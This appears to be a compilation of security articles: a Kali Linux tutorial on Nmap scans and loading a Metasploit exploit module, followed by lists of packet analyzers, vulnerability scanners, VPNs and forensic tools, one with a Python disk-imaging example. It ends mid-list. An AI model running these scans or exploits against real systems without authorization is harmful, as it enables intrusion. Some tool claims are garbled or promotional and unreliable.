Step 3) Select Add to Favorites

Once completed the item will be displayed within the Dock

Kali Linux has many other unique features, which makes this Operating System the primary choice by Security Engineers and Hackers alike. Unfortunately, covering them all is not possible within this tutorial; however, you should feel free to explore the different buttons displayed on the desktop.

What is Nmap?

Network Mapper, better known as Nmap for short, is a free, open-source utility used for network discovery and vulnerability scanning. Security professionals use Nmap to discover devices running in their environments. Nmap can also reveal the services and ports each host is serving, exposing a potential security risk. At the most basic level, consider Nmap ping on steroids. The more your technical skills evolve, the more usefulness you'll find in Nmap.

Nmap offers the flexibility to monitor a single host or a vast network consisting of hundreds if not thousands of devices and subnets. The flexibility Nmap offers has evolved over the years, but at its core, it's a port-scanning tool, which gathers information by sending raw packets to a host system. Nmap then listens for responses and determines if a port is open, closed or filtered.

The first scan you should be familiar with is the basic Nmap scan, which scans the first 1000 TCP ports. Each port it probes is reported as open, closed, or filtered, where filtered means a firewall is most likely in place modifying the traffic on that particular port. Below is a list of Nmap commands which can be used to run the default scan.

Nmap Target Selection

Scan a single IP

nmap 192.168.1.1

Scan a host

nmap www.testnetwork.com

Scan a range of IPs

nmap 192.168.1.1-20

Scan a subnet

nmap 192.168.1.0/24

Scan targets from a text file

nmap -iL list-of-ipaddresses.txt

How to Perform a Basic Nmap Scan on Kali Linux

To run a basic Nmap scan in Kali Linux, follow the steps below. With Nmap as depicted above, you have the ability to scan a single IP, a DNS name, a range of IP addresses, Subnets, and even scan from text files. For this example, we will scan the localhost IP address.

Step 1) From the Dock menu, click on the second tab which is the Terminal

Step 2) The Terminal window should open. Enter the command ifconfig; this command will return the local IP address of your Kali Linux system. In this example, the local IP address is 10.0.2.15

Step 3) Make a note of the local IP Address

Step 4) In the same terminal window, enter nmap 10.0.2.15; this will scan the first 1000 ports on the localhost. Considering this is the base install, no ports should be open.

Step 5) Review results

By default, nmap only scans the first 1000 ports. If you need to scan all 65535 ports, simply modify the above command to include -p-.

nmap 10.0.2.15 -p-

Nmap OS Scan

Another basic but useful feature of nmap is the ability to detect the OS of the host system. Kali Linux is secure by default, so for this example the host system on which Oracle's VirtualBox is installed will be used. The host system is a Windows 10 Surface, and its IP address is 10.28.2.26.

In the Terminal window enter the following nmap command:

nmap 10.28.2.26 -A

Review results

Adding -A tells nmap to not only perform a port scan but also try to detect the Operating System.

Nmap is a vital utility in any Security Professional's toolbox. Use the command nmap -h to explore more Nmap options and commands.

What is Metasploit?

The Metasploit Framework is an open source project that provides a public resource for researching vulnerabilities and developing code, giving security professionals the ability to infiltrate their own network and identify security risks and vulnerabilities. Metasploit was recently purchased by Rapid7 (https://www.metasploit.com). However, the community edition of Metasploit is still available on Kali Linux. Metasploit is by far the world's most used penetration testing utility.

It is important that you are careful when using Metasploit, because scanning a network or environment that is not yours could be considered illegal in some instances. In this tutorial, we'll show you how to start Metasploit and run a basic scan on Kali Linux. Metasploit is considered an advanced utility and will require some time to become adept with, but once you are familiar with the application it will be an invaluable resource.

Metasploit and Nmap

Within Metasploit, we can actually utilize Nmap. In this case, you'll learn how to scan your local VirtualBox subnet from Metasploit using the Nmap utility we just learned about.

Step 1) On the Applications Tab, scroll down to 08-Exploitation Tools and then select Metasploit

Step 2) A terminal box will open, with MSF in the dialog, this is Metasploit

Step 3) Enter the following command

db_nmap -v -sV 10.0.2.15/24

(be sure to replace 10.0.2.15 with your local IP address)

Here:

db_ stands for database (the scan results are saved into Metasploit's database)

-v stands for verbose mode

-sV stands for service version detection

Metasploit Exploit Utility

Metasploit is very robust in its features and flexibility. One common use for Metasploit is the exploitation of vulnerabilities. Below we'll go through the steps of reviewing some exploits and trying to exploit a Windows 7 machine.

Step 1) Assuming Metasploit is still open, enter hosts -R in the terminal window. This adds the hosts recently discovered to the Metasploit database.

Step 2) Enter "show exploits", this command will provide a comprehensive look at all the exploits available to Metasploit.

Step 3) Now, try to narrow down the list with this command: search name: Windows 7. This command searches for exploits which specifically include Windows 7; for the purpose of this example we will try to exploit a Windows 7 machine. Depending on your environment, you will have to change the search parameters to meet your criteria. For example, if you have a Mac or another Linux machine, you will have to change the search parameter to match that machine type.

Step 4) For the purposes of this tutorial we will use an Apple iTunes vulnerability discovered in the list. To utilize the exploit, we must enter the complete path which is displayed in the list: use exploit/windows/browser/apple_itunes_playlist

Step 5) If the module loads successfully, the command prompt will change to display the exploit name followed by > as depicted in the screenshot below.

Step 6) Enter show options to review what options are available to the exploit. Each exploit will, of course, have different options.

Summary

In sum, Kali Linux is an amazing operating system that is widely used by various professionals, from Security Administrators to Black Hat Hackers. Given its robust utilities, stability, and ease of use, it's an operating system everyone in the IT industry and every computer enthusiast should be familiar with. Utilizing just the two applications discussed in this tutorial will significantly aid a firm in securing its Information Technology infrastructure. Both Nmap and Metasploit are available on other platforms, but their ease of use and pre-installed configuration on Kali Linux makes Kali the operating system of choice when evaluating and testing the security of a network. As stated previously, be careful using Kali Linux: it should only be used in network environments which you control and/or have permission to test, as some utilities may actually cause damage or loss of data.

11 Best Wireshark Alternatives in 2020

Wireshark is a widely used network monitoring and WiFi troubleshooting tool. However, a limitation of the Wireshark tool is that you can only gather information from the network but cannot send this information.

Here is a curated list of the top 11 tools which are capable of replacing Wireshark. This list includes commercial as well as open-source tools, with their popular features and latest download links.

1) Cloud Shark

A web-based platform which allows you to view, analyze, and share packet capture files in a browser. It helps you to solve network problems faster with packet captures.

Features:

  • Drag and drop capture right into your browser, or upload using your API key

  • Cloud Shark can act like a drop-box for the files you generate

  • Allows readers to access advanced analysis from any device without any special software

  • You can instantly link your work to share with co-workers or customers

Download link: https://www.cloudshark.org/

2) Sysdig

Sysdig is an open source tool to monitor and secure containers, both for Windows and Mac. It comes with a command line interface which allows the user to track system activity in real time.

Features:

  • The tool supports application tracking

  • Helps you to enhance software reliability and bring an ideal resolution

  • Accelerate your transition to containers

  • Allows you to protect and assure your critical applications

Download link: https://sysdig.com/pricing/

3) Mojo Packets

Mojo Packets is yet another Wireshark alternative. It is an ideal tool for cloud-based WiFi analysis and troubleshooting.

Features:

  • Helps you to store and organize your traces in Packets for quick access

  • Allows you to capture packet traces at any remote site

  • Visualization of WiFi connections and visual coding

  • Tag particular parts of a trace with notes and share them for collaborative troubleshooting

Download Link: https://mojopackets.com/

4) Colasoft

Colasoft nChronos is a Network Performance Analysis Solution. It allows IT professionals to collect and save a high volume of packet-level network data. This data allows the user to navigate to specific time periods within the data.

Features:

  • Allows you to monitor your network and application performance in real-time

  • Analyze and troubleshoot all types of abnormalities in your system

  • Save IT cost and enhance the customer experience

Download link: https://www.colasoft.com/download/index.php

5) Debookee

Debookee is a network monitoring tool which allows you to intercept and monitor the traffic of any device in the same subnet. You can capture data from mobile devices, printers, or TVs on your Mac, without the need for any proxy.

Features:

  • Allows users to see what is happening on their network

  • Helps you to find out who is using your WIFI bandwidth

  • Scan your LAN or any IP range and helps you to find all the connected devices

  • Displays all Wi-Fi clients within radio range and the AP they're associated with

Download link: https://debookee.com/

6) Omnipeek

Omnipeek is the best tool for network analytics and performance diagnostics. It offers advanced capabilities for security investigations. The tool helps to compare, discover, and reduce your mean-time-to-resolution (MTTR).

Features:

  • You can scan packets for signs of trouble or detect changes in transfer speeds

  • The traffic analyzing feature can report on end-to-end performance for connections

  • Added support for 3rd party authentication

Download link: https://www.savvius.com/product/omnipeek/

7) Ettercap

Ettercap is a comprehensive network monitor tool. It also supports both active and passive dissection of different protocols. It also includes features for network and host analysis.

Features:

  • SSH3 and SSL support

  • Packet filtering/dropping

  • Remote traffic sniffing with the help of tunnels and route mangling

  • Passive OS fingerprinting

  • Allows you to kill the connection

Download link: http://www.ettercap-project.org/downloads.html

8) SmartSniff

SmartSniff is a network monitoring alternative to Wireshark. It allows you to capture data in a conversation-like sequence between servers and clients.

Features:

  • Helps you to capture TCP/IP packets on the network without installing a capture driver

  • Allows you to use the capture driver of Microsoft Network Monitor

  • SmartSniff helps you to capture data from other unsecured wireless networks

Download link: http://www.nirsoft.net/utils/smsniff.html

9) EtherApe

EtherApe is a graphical network monitoring solution. It supports Ethernet, FDDI, ISDN, SLIP, PPP, and WLAN devices. EtherApe allows you to select the level of the protocol stack to concentrate on.

Features:

  • You can use refined network data filters with the help of pcap syntax

  • Display averaging and node persistence times are fully configurable

  • A protocol summary dialog shows global traffic statistics by protocol

Download link: https://etherape.sourceforge.io/

10) SolarWinds

SolarWinds offers advanced network monitoring for on-premises, hybrid, and cloud services. The tool helps you to reduce network outages and improve the performance of your network.

Features:

  • Multi-vendor network monitoring

  • Network Insights for deeper visibility

  • NetPath and PerfStack for easy troubleshooting

  • Smarter scalability for large environments

Download link: https://www.solarwinds.com/network-management-software

11) PRTG monitor

PRTG monitors all systems, devices, traffic, and applications of your IT infrastructure. The tool can also monitor several networks from various locations.

Features:

  • Full featured web interface which is based on AJAX with high-security standards

  • SSL-secured local and remote access which can be used simultaneously

  • Visualize your network with the help of real time maps with real time status information

  • Allows you to monitor several networks in different locations

  • Helps you to run reports on demand or schedule regular reports

Download link: https://www.paessler.com/

13 BEST Vulnerability Assessment Scanners for Websites, Network

What is Vulnerability?

A vulnerability is a cyber security term which describes a weakness in the system's security design, process, implementation, or any internal control that may result in the violation of the system's security policy. In other words, it is a chance for intruders (hackers) to get unauthorized access.

What is Vulnerability Assessment?

Vulnerability assessment is a software testing type performed to evaluate the security risks in the software system in order to reduce the probability of a threat.

What is the importance of vulnerability assessment in a company?

  • It helps you to detect security exposures before attackers find them.

  • You can create an inventory of network devices, including system information and purpose.

  • It defines risk level which exists on the network.

  • Establish a benefit curve and optimize security investments.

Following is a handpicked list of Top Vulnerability Scanning Tools, with their popular features and website links. The list contains both open source (free) and commercial (paid) software.

1) Nessus Professional

Nessus Professional is a vulnerability assessment tool for checking compliance, searching for sensitive data, and scanning IPs and websites. The tool is designed to make vulnerability assessment simple, easy, and intuitive.

Features:

  • It has advanced detection technology for more protection.

  • The tool offers complete vulnerability scanning with unlimited assessments.

  • It provides accurate visibility into your computer network.

  • Plugins which deliver timely protection benefits from new threats.

  • It allows you to migrate to Tenable solutions safely.

  • This tool detects SQL injection attacks.

Link: https://www.tenable.com/products/nessus/nessus-professional


2) BeyondTrust

BeyondTrust is a free online vulnerability scanner that finds configuration issues, network vulnerabilities, and missing patches across applications, devices, virtual environments, and operating systems.

Features:

  • This tool has a user-friendly interface for streamlined vulnerability assessment, management, and content.

  • It provides patch management.

  • Improve risk management and prioritization.

  • The tool provides support for VMware that includes virtual image scanning.

  • It allows you to integrate with vCenter and scan virtual applications for security.

Link: https://www.beyondtrust.com/tools/vulnerability-scanner


3) Intruder

Intruder is a cloud-based network vulnerability scanner for your external infrastructure. This tool finds security weaknesses in your computer systems to help avoid data breaches.

Features:

  • You can synchronize your external IPs and DNS hostnames.

  • It is developer-friendly software which can be integrated with Slack or Jira so that the team is informed of security issues.

  • The tool has Network View that helps you to keep track of your exposed ports and services.

  • You can receive email and Slack notifications when scans complete, and summary PDF reports emailed on a monthly basis.

  • Intruder.io has more than 10,000 security checks for each vulnerability scan.

Link: https://intruder.io


4) Tripwire IP360

Tripwire IP360 protects the integrity of mission-critical systems spanning virtual, physical, DevOps, and cloud environments. It delivers critical security controls, including secure configuration management, vulnerability management, log management, and asset discovery.

Features:

  • Modular architecture that scales to your deployments and needs.

  • The tool has prioritized risk scoring features.

  • It helps you to maximize your organization's productivity via integrations with various tools you already use.

  • Accurately identify, search, and profile all assets on your network.

Link: https://www.tripwire.com/products/tripwire-ip360/


5) Wireshark

Wireshark is a tool which keeps watch on network packets and displays them in a human-readable format. The information that is retrieved via this tool can be viewed through a GUI or the TTY mode TShark Utility.

Features:

  • Live capture and offline analysis

  • Rich VoIP analysis

  • Compressed Gzip files can be decompressed on the fly

  • Output can be exported to plain text, XML, or CSV

  • Multi-platform: Runs on Windows, Linux, FreeBSD, NetBSD, and many others

  • Live data can be read from PPP/HDLC, Ethernet, ATM, Bluetooth, Token Ring, USB, and more.

  • Decryption support for many protocols that include IPsec, ISAKMP, SSL/TLS, WEP, and WPA/WPA2

  • For quick, intuitive analysis, coloring rules can be applied to the packet

  • Read or write many different capture file formats like Cisco Secure IDS iplog, Pcap NG, and Microsoft Network Monitor, etc.

Link: https://www.wireshark.org/


6) Paessler

Paessler's security vulnerability assessment tool has advanced infrastructure management capabilities. The tool monitors IT infrastructure using technologies like SNMP, WMI, sniffing, REST APIs, SQL, and others.

Features:

  • You can monitor jFlow, sFlow, IP SLA, Firewall, IP, LAN, Wi-Fi, Jitter, and IPFIX.

  • It provides alerts via email, plays alarm audio files, or triggers HTTP requests.

  • The tool provides multiple user web interfaces.

  • It has automated failover handling.

  • You can visualize your network using maps.

  • Paessler allows you to monitor networks in various locations.

  • You can get the numbers, statistics, and graphs for the data you are going to monitor or configure.

Link: https://www.paessler.com/network-security-monitoring


7) OpenVAS

OpenVAS is a vulnerability scanner that helps you to perform authenticated and unauthenticated testing, and supports various high-level and low-level Internet and industrial protocols.

Features:

  • You can perform vulnerability tests with a long history and daily updates.

  • Includes more than 50,000 vulnerability tests.

  • It provides performance tuning and internal programming code to implement any type of vulnerability test you want to perform.

Link: http://www.openvas.org/


8) Aircrack

Aircrack is one of the handy tools required to check for vulnerabilities and to make your Wi-Fi network secure. This tool focuses on the WEP, WPA and WPA2 encryption keys that protect wireless connections, helping to identify vulnerable wireless connections.

Features:

  • More cards/drivers supported

  • Provides support for all types of OS and platforms

  • New WEP attack: PTW

  • Support for WEP dictionary attack

  • Protect you from Fragmentation attack

  • Improved tracking speed

Link: https://www.aircrack-ng.org/


9) Comodo HackerProof

Comodo HackerProof revolutionizes the way you test your website and app security. It includes PCI Scanning and site inspector for website scanning.

Features:

  • The tool is built with the latest technology that invites more interaction, building trust for any web site.

  • Comodo allows the user to present credentials on your website.

  • This software product provides more website credibility without changing the layout of web pages.

  • 100+ people are associated with the Comodo brand.

  • Not vulnerable to popup blockers

  • It uses rollover functionality to tell visitors that the website is trusted.

  • Software interrupts your website visitors to take any actions and steal your valuable business.

Link: https://www.comodo.com/hackerproof/


10) Microsoft Baseline Security Analyzer (MBSA)

Microsoft Baseline Security Analyzer (MBSA) provides a streamlined procedure to find common security misconfigurations and missing security updates.

Features:

  • MBSA scans for update rollups, missing security updates, and service packs available from Microsoft Update.

  • The download is available for various languages like English, German, Japanese, and French.

  • This tool includes a command-line interface and graphical user interface that performs a local or remote scan of Microsoft Windows Systems.

  • Scans agent computer systems and informs you about missing security patches.

  • Places the required MBSA binaries on all MOM agents.

Link: https://www.microsoft.com/en-us/download/search.aspx?q=MBSA


11) Nikto

Nikto analyzes web servers for 6700+ potentially dangerous programs. This tool checks for server configuration items such as HTTP server options and the presence of multiple index files, and will attempt to identify installed web servers and software.

Features:

  • Full HTTP proxy support

  • The tool automatically finds outdated server components.

  • Save reports in HTML, plain text, CSV, XML, or NBE.

  • It has a template engine for easy report customization.

  • Scan multiple servers or multiple ports on a server.

  • Host authentication with Basic and NTLM.

  • Authorization guessing handles any directory.

Link: https://cirt.net/Nikto2


12) Solarwinds Configuration Manager

Solarwinds Configuration Manager is a software which is used to handle configs through policy management, backup, and automation. This tool reduces the time needed to manage critical changes and repetitive tasks across complex, multi-vendor networks.

Features:

  • You can locate the current configuration and instantly apply it to a replacement spare, or to roll back a blown configuration.

  • Protect your Cisco devices from malware.

  • It provides effective troubleshooting and network management to your Palo Alto Networks firewall.

  • The tool detects faults and identifies and corrects a range of configuration errors.

  • You can know devices connected to the network, their hardware, and software configurations.

  • Control who can view device details and make configuration changes and determine when network changes can occur.

Link: https://www.solarwinds.com/network-configuration-manager


13) Nexpose Community

Nexpose is a useful vulnerability management software. With this tool, you can monitor exposure in real time and adapt to new threats with fresh data.

Features:

  • Get a real-time view of risk.

  • It brings innovative and progressive solutions that help the user to get their jobs done.

  • Know where to focus.

  • Bring more to your security program

  • Provide IT with necessary details they have to fix any issues.

Link: https://www.rapid7.com/products/nexpose/

Best 16 No-Log VPN (2020 Update)

No-log VPN tools do not exchange user information over the network. Log-less software provides a secure way to connect devices over the internet. This software does not store your data, so it remains reliable even if your network is compromised.

Following is a handpicked list of top no-log VPN tools, with popular features and latest download links.

1) PureVPN

The PureVPN tool provides a safe way to access anything on the internet. Using this tool, you can stay protected while you browse the internet. PureVPN does not store your VPN IP or the specific time you connect to the server.

Features:

  • It has 2,000+ servers in more than 140 countries.

  • The software provides unlimited bandwidth.

  • Allows split tunneling in which you can choose the data connection method, through VPN or ISP.

  • Friendly live support 24 hours a day

  • Provides P2P enabled services by optimizing servers with a secure file share.

Download link: https://www.purevpn.com/

2) SaferVPN

SaferVPN provides seamless VPN apps for Windows, iOS, Mac, Android, Firefox, and Chrome. It allows you to hide your personal information. SaferVPN protects from snoopers, hackers, and cyber scams.

Features:

  • It has 700+ high-speed servers in 34+ countries.

  • This software does not log your VPN and source IP address, DNS queries, metadata, or browsing history.

  • Helps you to protect all of your valuable data and personal information over any unsecured public Wi-Fi hotspot

  • Allows you to access blocked sites, online streams, apps, games, and smart TVs from anywhere in the world.

  • Provides unlimited server switching.

  • Helps you to call other people securely using apps like Telegram, Whatsapp, and Viber.

Download link: https://www.safervpn.com/

3) NordVPN

NordVPN is a software which does not track, collect, or share data. It is available on Android, Windows, Apple, macOS, and Linux. You can enjoy fast connection without buffering.

Features:

  • 5700 NordVPN servers in more than 60 countries

  • This software does not store session information, used bandwidth, IP addresses, traffic data, and session details

  • Provides double VPN or onion over VPN.

  • NordVPN does not log your online activity.

  • Offers 24/7 product support.

Download link: https://nordvpn.com

4) ExpressVPN

ExpressVPN secures internet browsing against three-letter agencies and scammers. It offers unlimited access to music, social media, and video, and never logs IP addresses, browsing history, DNS queries, or traffic destinations.

Features:

  • Servers in 160 locations and 94 countries

  • Connect to the VPN without any bandwidth limitation.

  • Provides online protection using leak proofing and encryption.

  • Stay secure by hiding IP address and encrypting your network data.

  • Assistance is available 24/7 via email as well as live chat.

  • Pay with Bitcoin and use Tor in order to access hidden sites.

Download link: https://www.expressvpn.com/

5) CyberGhost

CyberGhost software provides you secure P2P torrenting. You can unblock all streaming services. It allows you to encrypt your online connection and boosts your security as well as digital privacy. CyberGhost tool automatically protects whenever you connect to a new internet connection.

Features:

  • Having 4900 servers in more than 59 countries

  • Allows access to NoSpy server.

  • Encrypts data with 256-bit AES.

  • Allows you to connect seven devices simultaneously

  • Provides unlimited bandwidth

  • CyberGhost VPN allows you to put your privacy first and protects you against data miners and hackers.

Download link: https://www.cyberghostvpn.com/en_US/

6) Surfshark

Surfshark provides fast and secure access to web content. It makes your location private and keeps your sensitive data secure. This software offers secure tunneling protocols like OpenVPN and IKEv2.

Features:

  • More than 800 servers in 50+ countries

  • Allow particular apps & websites to bypass the VPN

  • Protect your confidentiality by hiding your real IP address

  • Prevents IP, WebRTC, and DNS leaks.

Download link: https://surfshark.com

7) ProtonVPN

ProtonVPN enables you to use the web anonymously, unblock websites & encrypt your internet connection. It uses a high-speed Swiss VPN server that protects your privacy.

Features:

  • More than 436 servers, available in 33+ countries.

  • Uses cipher suites with Perfect Forward Secrecy, so a compromised long-term key does not expose previously recorded sessions.

  • Anonymous VPN service allows you to use the Internet without surveillance.

  • It can integrate with the Tor anonymity network.

  • Pass user traffic through a secure core network in countries like Iceland and Switzerland.

Download link: https://protonvpn.com/

8) Unlocator

Unlocator allows you to surf the internet by maintaining privacy without any restriction. Whenever you use this software, your network connection becomes encrypted, and all your network activity remains secure.

Features:

  • Unlocator has servers in 36 countries

  • It supports 58 devices and platforms.

  • Allows you One-Click Privacy and Security

  • Offers privacy of VPN with the ease of Smart DNS streaming

  • Protects your privacy with no IP, DNS, or WebRTC leaks.

Download link: https://unlocator.com/

9) Astrill

Astrill is another no-log VPN software that allows you to share VPN connection with multiple devices on your home network, including Xbox, Roku Boxes, PS4, and Boxee. It allows you to connect your whole home or office to VPN with 5 simultaneous connections.

Features:

  • Servers in more than 113 cities and 64 countries

  • SSL/TLS encryption to secure network traffic

  • Connect devices to any server

  • Offer unlimited server switches

  • Protects your Internet traffic from eavesdroppers and attackers via SSL/TLS encryption

  • Accepts Bitcoin payments

Download link: https://www.astrill.com/

10) VPN Unlimited

VPN Unlimited protects you whether you are entering credit card data or personal passwords. It shields your personal data from third parties and attackers by establishing an encrypted tunnel to its servers.

Features:

  • It has more than 400 super-fast servers.

  • Servers in 70+ locations

  • Connect up to 5 devices

  • Protects your privacy by changing your visible IP address.

  • Protects your traffic on any Wi-Fi network.

Download link: https://www.vpnunlimitedapp.com/en

11) F-Secure Freedome

F-Secure Freedome hides your IP address by routing your traffic through a server in another location. This software secures online banking, e-commerce transactions, tax filing, browsing, and streaming. It also lets you access geo-blocked content.

Features:

  • Provides unlimited bandwidth

  • F-Secure provides access to geo-blocked content with no hassle

  • No registration or account needed to use this software.

  • Prevents your internet provider from tracking you and your online activities.

Download link: https://www.f-secure.com/en/home/products/freedome

12) HexaTech

HexaTech offers safe, private access to all your content across the world. With the help of HexaTech VPN, you will get secure connections with military-grade encryption to protect you from various cyber-attacks.

Features:

  • Access Wi-Fi networks securely

  • Blocks advertisers, your ISP, and attackers from tracking you online.

  • Automatically blocks known online threats.

  • Offers intelligent web tracking prevention.

  • No registration or login is needed to use this tool.

Download link: https://www.hexatechvpn.com/

13) Bitdefender VPN

Bitdefender VPN is security software which is recognized by computer experts and independent labs. It gives real-world protection to your network. This software helps you to keep home and enterprise protected against cyber threats.

Features:

  • Used by more than 500 million users in over 150 countries.

  • Prevents all types of IP leak.

  • Not subject to a data retention law.

  • Cloud-based centralized control for multiple devices.

  • Blocks malware and attackers attempting to exploit vulnerabilities in your system.

Download link: https://www.bitdefender.com/

14) Browsec

Browsec allows you to access any site, anywhere. This software protects your data from sniffers. It offers anonymous browsing on various devices, including a computer, iOS, or Android mobile device. It is a browser extension compatible with the major browsers, including Chrome, Firefox, and Opera.

Features:

  • More than 400 servers in 36 countries

  • Access geo-restricted content

  • Provides fast email support

  • A kill switch drops the connection if the VPN server becomes unavailable, so traffic is never sent outside the tunnel.

  • It has smart settings feature which allows you to hide your identity when visiting certain websites.

Download link: https://browsec.com/en/

15) Hidemyass

Hidemyass provides secure banking transactions. You can get VPN protection for your IoT network. It enables users to remain anonymous and encrypt online traffic. Hidemyass is a dedicated no-log VPN tool for streaming and P2P sharing.

Features:

  • It has 980+ VPN servers in more than 290 locations.

  • Allows browsing using secure public Wi-Fi.

  • Provides privacy by hiding your searches and browsing history.

  • Unblock restricted content without any hassle

Download link: https://www.hidemyass.com/en-in/index

16) TigerVPN

TigerVPN lets you reach geo-blocked services and bypass censorship that would otherwise make content unavailable.

Features:

  • It has 300 VPN servers in 62 locations

  • It provides quick and efficient customer support via live chat

  • It helps you to improve your internet speed on gaming or streaming.

  • Shared (meshed) IP addresses for enhanced privacy

  • Allows you to protect all devices at the same time

Download link: https://www.tigervpn.com/

15 BEST Digital Forensic Tools in 2020 [Free/Paid]

Digital forensics is the process of preserving, identifying, extracting, and documenting computer evidence that can be used in a court of law. There are many tools that make this process simpler. These applications produce complete reports that can be used in legal proceedings.

Following is a handpicked list of Digital Forensic Toolkits, with their popular features and website links. The list contains both open source(free) and commercial(paid) software.

1) ProDiscover Forensic

ProDiscover Forensic is a computer security app that allows you to locate all the data on a computer disk. It can protect evidence and create quality reports for the use of legal procedures. This tool allows you to extract EXIF(Exchangeable Image File Format) information from JPEG files.

Features:

  • This product supports Windows, Mac, and Linux file systems.

  • You can preview and search for suspicious files quickly.

  • It creates a copy of the entire suspected disk to keep the original evidence safe.

  • This tool helps you to see internet history.

  • You can import or export .dd format images.

  • It enables you to add comments to evidence of your interest.

  • ProDiscover Forensic supports VMware to run a captured image.

Link: https://www.prodiscover.com


2) Sleuth Kit (+Autopsy)

The Sleuth Kit is a library and collection of command-line tools for analyzing disk images and file systems; Autopsy is its graphical front end and runs on Windows, Linux, and macOS. Together they make forensic analysis of computer systems easier, letting you examine hard drives and smartphones.

Features:

  • You can identify activity using a graphical interface effectively.

  • This application provides analysis for emails.

  • You can group files by their type to find all documents or images.

  • It displays a thumbnail of images to quick view pictures.

  • You can tag files with the arbitrary tag names.

  • The Sleuth Kit enables you to extract data from call logs, SMS, contacts, etc.

  • It helps you to flag files and folders based on path and name.

Link: https://www.sleuthkit.org


3) CAINE

CAINE (Computer Aided INvestigative Environment) is an Ubuntu-based live distribution that offers a complete forensic environment with a graphical interface. This tool can be integrated into existing software tools as a module. It automatically extracts a timeline from RAM.

Features:

  • It supports the digital investigator during the four phases of the digital investigation.

  • It offers a user-friendly interface.

  • You can customize features of CAINE.

  • This software offers numerous user-friendly tools.

Link: https://www.caine-live.net


4) PALADIN

PALADIN is Ubuntu based tool that enables you to simplify a range of forensic tasks. It provides more than 100 useful tools for investigating any malicious material. This tool helps you to simplify your forensic task quickly and effectively.

Features:

  • It provides both 64-bit and 32-bit versions.

  • This tool is available on a USB thumb drive.

  • This toolbox has open-source tools that help you to search for the required information effortlessly.

  • This tool has more than 33 categories that assist you in accomplishing a cyber forensic task.

Link: https://sumuri.com/software/paladin/


5) EnCase

EnCase is an application that helps you to recover evidence from hard drives. It allows you to conduct an in-depth analysis of files to collect proof such as documents, pictures, etc.

Features:

  • You can acquire data from numerous devices, including mobile phones, tablets, etc.

  • It enables you to produce complete reports for maintaining evidence integrity.

  • You can quickly search, identify, as well as prioritize evidence.

  • EnCase Forensic helps you to unlock encrypted evidence.

  • It automates the preparation of evidence.

  • You can perform both deep analysis and triage (a quick pass that ranks evidence by relevance and priority).

Link: https://www.guidancesoftware.com/encase-forensic


6) SANS SIFT

SANS SIFT is a computer forensics distribution based on Ubuntu. It provides a digital forensic and incident response examination facility.

Features:

  • It can work on a 64-bit operating system.

  • Offers improved memory utilization.

  • It automatically updates the DFIR (Digital Forensics and Incident Response) package.

  • You can install it via SIFT-CLI (Command-Line Interface) installer.

  • This tool contains numerous latest forensic tools and techniques.

Link: https://digital-forensics.sans.org/community/downloads/


7) FTK Imager

FTK (Forensic Toolkit) is a commercial forensic suite developed by AccessData; FTK Imager is its free companion for creating forensic images and previewing evidence. FTK Imager creates bit-for-bit copies of data without making changes to the original evidence, and the suite lets you specify criteria such as file size, pixel size, and data type to reduce the amount of irrelevant data.

Features:

  • It provides a wizard-driven approach to detect cybercrime.

  • This program offers better visualization of data using a chart.

  • You can recover passwords from more than 100 applications.

  • It has an advanced and automated data analysis facility.

  • FTK Imager helps you to manage reusable profiles for different investigation requirements.

  • It supports pre and post-processing refinement.

Link: https://accessdata.com/products-services/forensic-toolkit-ftk
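Evidence preservation in practice, as an added example that is not code from FTK Imager or any other tool on this list: a bit-for-bit copy of a source, hashed as it is read and re-hashed after it is written, so the examiner can show that the image matches the original and that it has not changed since. The source here is a constructed temporary file standing in for a disk; the 4 KiB block size, the `.dd` suffix and the choice of SHA-256 are assumptions of this example.

```python
"""Bit-for-bit imaging with hash verification (added example, not vendor code)."""
import hashlib
import os
import tempfile

BLOCK_SIZE = 4096  # assumed read size; real imagers use much larger buffers


def hash_file(path, algorithm="sha256"):
    """Stream a file through a hash and return its hex digest."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(BLOCK_SIZE), b""):
            h.update(chunk)
    return h.hexdigest()


def acquire_image(source_path, image_path):
    """Copy source to image byte for byte, hashing the stream as it is read.

    Returns (hash of the bytes read, hash of the image re-read from disk);
    the two must agree or the write was not faithful."""
    stream_hash = hashlib.sha256()
    with open(source_path, "rb") as src, open(image_path, "wb") as dst:
        for chunk in iter(lambda: src.read(BLOCK_SIZE), b""):
            stream_hash.update(chunk)
            dst.write(chunk)
    return stream_hash.hexdigest(), hash_file(image_path)


def verify_image(source_path, image_path, recorded_hash):
    """True only if the source, the image and the recorded hash all agree."""
    return hash_file(source_path) == recorded_hash == hash_file(image_path)


def demo():
    """Image a constructed 'device', verify it, then show that flipping one
    bit of the image is detected. Returns (verified, tamper_detected)."""
    with tempfile.TemporaryDirectory() as d:
        device = os.path.join(d, "evidence.bin")  # stands in for /dev/sdX
        image = os.path.join(d, "evidence.dd")
        # Constructed sample content: a marker plus random filler that is
        # deliberately not a multiple of BLOCK_SIZE, to exercise the tail.
        with open(device, "wb") as f:
            f.write(b"EVIDENCE" + os.urandom(3 * BLOCK_SIZE + 123))

        stream_hash, image_hash = acquire_image(device, image)
        verified = stream_hash == image_hash and verify_image(device, image, stream_hash)

        # Tamper with a single byte of the image; verification must now fail.
        with open(image, "r+b") as f:
            f.seek(10)
            original = f.read(1)
            f.seek(10)
            f.write(bytes([original[0] ^ 0x01]))
        tamper_detected = not verify_image(device, image, stream_hash)
        return verified, tamper_detected


if __name__ == "__main__":
    print(demo())
```

The recorded digest belongs in the chain-of-custody record alongside who acquired the image and when; any later analysis should start by re-running `verify_image` against that recorded value, never by trusting the copy on disk.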


8) Magnet RAM capture

Magnet RAM capture records the memory of a suspected computer. It allows investigators to recover and analyze valuable items which are found in memory.

Features:

  • You can run this app while minimizing overwritten data in memory.

  • It enables you to export captured memory data and upload it into analysis tools like magnet AXIOM and magnet IEF.

  • This app supports a vast range of Windows operating systems.

  • Captures the full physical memory of a live Windows system.

Link: https://www.magnetforensics.com/resources/magnet-ram-capture/


9) X-Ways Forensics

X-Ways Forensics is software that provides a work environment for computer forensic examiners. This program supports disk cloning and imaging. It enables you to collaborate with other people who have this tool.

Features:

  • It has ability to read partitioning and file system structures inside .dd image files.

  • You can access disks, RAIDs (Redundant array of independent disk), and more.

  • It automatically identifies lost or deleted partitions.

  • This tool detects NTFS (New Technology File System) alternate data streams (ADS).

  • X-Ways Forensics supports bookmarks or annotations.

  • It has the ability to analyze remote computers.

  • You can view and edit binary data by using templates.

  • It provides write protection for maintaining data authenticity.

Link: http://www.x-ways.net/forensics/


10) Wireshark

